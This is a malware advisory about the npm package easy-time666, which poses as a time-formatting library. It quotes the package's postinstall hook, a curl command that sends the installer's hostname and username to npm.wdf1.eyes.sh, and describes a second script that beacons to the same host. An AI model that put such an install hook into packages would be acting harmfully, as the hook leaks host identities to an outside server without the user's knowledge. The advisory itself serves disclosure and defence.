—

MAL-2026-5749

Malicious code in easy-time666 (npm)

Details

--- _-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (57bc31746af3bff6006bfe2da34cd0fb223a4bd9e867abddd172be5018821c22) package.json declares a postinstall hook that runs `curl http://npm.wdf1.eyes.sh/pre?h=$(hostname)&u=&(whoami)` over plain HTTP on every `npm install`, leaking the installer's hostname and current username to a non-publisher domain. The package advertises itself as a time-formatting library and has no legitimate reason to phone home with host identifiers. A second file, scripts/postinstall.js, is shipped in the tarball and POSTs JSON `{ping:'npm'}` to the same host (`npm.wdf1.eyes.sh`) over plain HTTP, reinforcing the install-time callback. This is the canonical recon-beacon pattern used to enumerate compromised hosts before staging follow-on payloads.

Are you affected?

Enter the version of the package you're using.

Affected packages

npm / easy-time666

No fixed version published yet for easy-time666 (npm). Pin to a known-safe version or switch to an alternative.

References

https://www.npmjs.com/package/easy-time666/v/1.0.0 [PACKAGE]